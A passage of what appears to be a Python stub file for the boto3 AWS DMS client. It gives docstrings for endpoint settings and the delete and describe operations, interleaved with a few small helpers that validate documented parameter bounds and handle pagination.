- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis target endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch target endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the Elasticsearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint.
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server-side encryption you want to use for your data. This is part of the endpoint settings or the extra connection attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of characters you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. If left unset, it defaults to ``auto`` . Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:rtype: dict
:returns:
"""
pass
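Several of the Redshift settings above carry documented numeric bounds (``FileTransferUploadStreams`` 1–64, ``MaxFileSize`` 1–1048576 KB, ``WriteBufferSize`` 1–2048 rows). As an illustrative sketch only (this helper is not part of boto3 or the DMS API), a client-side check can catch out-of-range values before the settings dict is submitted:

```python
def validate_redshift_settings(settings: dict) -> list:
    """Return a list of error strings for out-of-range RedshiftSettings values.

    Bounds are taken from the parameter descriptions above:
    FileTransferUploadStreams 1-64, MaxFileSize 1-1048576 KB,
    WriteBufferSize 1-2048 rows. Keys that are absent are skipped.
    """
    bounds = {
        "FileTransferUploadStreams": (1, 64),
        "MaxFileSize": (1, 1048576),
        "WriteBufferSize": (1, 2048),
    }
    errors = []
    for key, (lo, hi) in bounds.items():
        value = settings.get(key)
        if value is not None and not (lo <= value <= hi):
            errors.append(f"{key}={value} outside [{lo}, {hi}]")
    return errors
```

For example, ``validate_redshift_settings({"MaxFileSize": 32768})`` returns an empty list, while an oversized ``WriteBufferSize`` produces a single error string.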
def delete_event_subscription(self, SubscriptionName: str) -> Dict:
"""
Deletes an AWS DMS event subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteEventSubscription>`_
**Request Syntax**
::
response = client.delete_event_subscription(
SubscriptionName='string'
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The event subscription that was deleted.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the AWS DMS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A list of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the DMS event notification subscription to be deleted.
:rtype: dict
:returns:
"""
pass
def delete_replication_instance(self, ReplicationInstanceArn: str) -> Dict:
"""
Deletes the specified replication instance.
.. note::
You must delete any migration tasks that are associated with the replication instance before you can delete it.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationInstance>`_
**Request Syntax**
::
response = client.delete_replication_instance(
ReplicationInstanceArn='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that was deleted.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
One or more public IP addresses for the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
One or more private IP addresses for the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance to be deleted.
:rtype: dict
:returns:
"""
pass
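The ``ReplicationInstanceIdentifier`` constraints above (1–63 alphanumeric characters or hyphens, first character a letter, no trailing hyphen, no two consecutive hyphens) can be checked locally before calling the API. This is a hedged sketch of such a validator, not an AWS-provided function:

```python
import re


def is_valid_replication_instance_identifier(identifier: str) -> bool:
    """Check the documented ReplicationInstanceIdentifier constraints:
    1-63 alphanumeric characters or hyphens, first character a letter,
    no trailing hyphen, and no two consecutive hyphens."""
    if not 1 <= len(identifier) <= 63:
        return False
    if not re.fullmatch(r"[A-Za-z0-9-]+", identifier):
        return False
    if not identifier[0].isalpha():
        return False
    if identifier.endswith("-") or "--" in identifier:
        return False
    return True
```

The documented example ``myrepinstance`` passes; identifiers that start with a digit, end with a hyphen, or contain ``--`` are rejected.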
def delete_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str) -> Dict:
"""
Deletes a subnet group.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.delete_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The subnet group name of the replication instance.
:rtype: dict
:returns:
"""
pass
def delete_replication_task(self, ReplicationTaskArn: str) -> Dict:
"""
Deletes the specified replication task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationTask>`_
**Request Syntax**
::
response = client.delete_replication_task(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The deleted replication task.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time: 2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task to be deleted.
:rtype: dict
:returns:
"""
pass
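The ``CdcStartPosition`` examples above show three distinct formats: a checkpoint string, an ISO-style date, and an LSN/SCN. A hedged, illustrative heuristic (not an AWS-provided parser) for telling them apart might look like:

```python
import re


def classify_cdc_start_position(position: str) -> str:
    """Classify a CdcStartPosition string as 'checkpoint', 'date', or 'lsn',
    based on the example formats in the documentation above. Anything that
    is neither a checkpoint nor a date is treated as an LSN/SCN value."""
    if position.startswith("checkpoint:"):
        return "checkpoint"
    # Dates look like 2018-03-08T12:12:12
    if re.fullmatch(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", position):
        return "date"
    return "lsn"
```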
def describe_account_attributes(self) -> Dict:
"""
Lists all of the AWS DMS attributes for a customer account. The attributes include AWS DMS quotas for the account, such as the number of replication instances allowed. The description for a quota includes the quota name, current usage toward that quota, and the quota's maximum value.
This command does not take any parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeAccountAttributes>`_
**Request Syntax**
::
response = client.describe_account_attributes()
**Response Syntax**
::
{
'AccountQuotas': [
{
'AccountQuotaName': 'string',
'Used': 123,
'Max': 123
},
]
}
**Response Structure**
- *(dict) --*
- **AccountQuotas** *(list) --*
Account quota information.
- *(dict) --*
Describes a quota for an AWS account, for example, the number of replication instances allowed.
- **AccountQuotaName** *(string) --*
The name of the AWS DMS quota for this AWS account.
- **Used** *(integer) --*
The amount currently used toward the quota maximum.
- **Max** *(integer) --*
The maximum allowed value for the quota.
:rtype: dict
:returns:
"""
pass
def describe_certificates(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Provides a description of the certificates for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeCertificates>`_
**Request Syntax**
::
response = client.describe_certificates(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Certificates': [
{
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
The pagination token.
- **Certificates** *(list) --*
The Secure Sockets Layer (SSL) certificates associated with the replication instance.
- *(dict) --*
The SSL certificate that can be used to encrypt connections between the endpoints and the replication instance.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type Filters: list
:param Filters:
Filters applied to the certificate described in the form of key-value pairs.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 10
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
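All of the ``describe_*`` operations in this client share the ``Marker`` / ``MaxRecords`` pagination pattern described above. The client-side loop this implies can be sketched as follows; ``fetch_page`` here is a hypothetical stand-in for any of the describe calls, and this helper is not part of boto3 (which also offers paginators for this purpose):

```python
def collect_all_records(fetch_page, result_key: str) -> list:
    """Accumulate results across pages using the Marker/MaxRecords pattern
    shared by the describe_* operations. fetch_page(Marker=...) must return
    a dict containing result_key and, while more pages remain, a 'Marker'
    token to pass to the next call."""
    records = []
    marker = None
    while True:
        page = fetch_page(Marker=marker) if marker else fetch_page()
        records.extend(page.get(result_key, []))
        marker = page.get("Marker")
        if not marker:
            return records
```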
def describe_connections(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Describes the status of the connections that have been made between the replication instance and an endpoint. Connections are created when you test an endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeConnections>`_
**Request Syntax**
::
response = client.describe_connections(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Connections': [
{
'ReplicationInstanceArn': 'string',
'EndpointArn': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'EndpointIdentifier': 'string',
'ReplicationInstanceIdentifier': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Connections** *(list) --*
A description of the connections.
- *(dict) --*
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **Status** *(string) --*
The connection status.
- **LastFailureMessage** *(string) --*
The error message when the connection last failed.
- **EndpointIdentifier** *(string) --*
The identifier of the endpoint. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
:type Filters: list
:param Filters:
The filters applied to the connection.
Valid filter names: endpoint-arn | replication-instance-arn
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_endpoint_types(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the type of endpoints available.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEndpointTypes>`_
**Request Syntax**
::
response = client.describe_endpoint_types(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'SupportedEndpointTypes': [
{
'EngineName': 'string',
'SupportsCDC': True|False,
'EndpointType': 'source'|'target',
'EngineDisplayName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **SupportedEndpointTypes** *(list) --*
The type of endpoints that are supported.
- *(dict) --*
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
- **SupportsCDC** *(boolean) --*
Indicates if Change Data Capture (CDC) is supported.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: engine-name | endpoint-type
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_endpoints(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the endpoints for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEndpoints>`_
**Request Syntax**
::
response = client.describe_endpoints(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Endpoints': [
{
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
